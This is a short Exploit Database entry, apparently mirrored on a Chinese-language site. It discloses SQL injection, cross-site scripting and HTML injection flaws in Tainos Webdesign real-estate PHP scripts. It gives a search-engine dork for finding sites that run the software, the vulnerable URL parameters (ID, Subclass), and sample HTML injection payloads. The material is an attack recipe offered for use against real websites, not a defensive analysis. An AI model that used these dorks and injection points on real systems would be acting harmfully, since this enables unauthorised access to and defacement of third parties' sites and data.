Tainos Webdesign (All Scripts) – SQL Injection / Cross-Site Scripting / HTML Injection

• Exploit Database
• 15 阅读

• 作者： CoBRa_21
  日期： 2010-05-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12631/

• -------------------------------------------------------------------------------------------
  
  Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability
  
  -------------------------------------------------------------------------------------------
  
  Author: CoBRa_21
  
  Mail: uyku_cu@windowslive.com
  
  Script Home: http://www.tainos-webdesign.com
  
  Dork: intext:"© Tainos Webdesign"
  
  -------------------------------------------------------------------------------------------
  
  Sql Injection:
  
  http://localhost/[path]/propertylux.php?ID=1 (SQL)
  http://localhost/[path]/property.php?ID=199 (SQL)
  
  -------------------------------------------------------------------------------------------
  
  XSS Injection:
  
  http://localhost/[path]/class.php?Class=Rental&Subclass=
  http://localhost/[path]/class.php?Class=Sales&Subclass=
  http://localhost/[path]/classlux.php?Class=Luxury&Subclass=
  -------------------------------------------------------------------------------------------
  
  HTML Injection:
  
  http://localhost/[path]/class.php?Class=Rental&Subclass=<font color=red size=15>CoBRa_21</font>
  http://localhost/[path]/class.php?Class=Sales&Subclass=<font color=red size=15>CoBRa_21</font>
  http://localhost/[path]/classlux.php?Class=Luxury&Subclass=<font color=red size=15>CoBRa_21</font>
  -------------------------------------------------------------------------------------------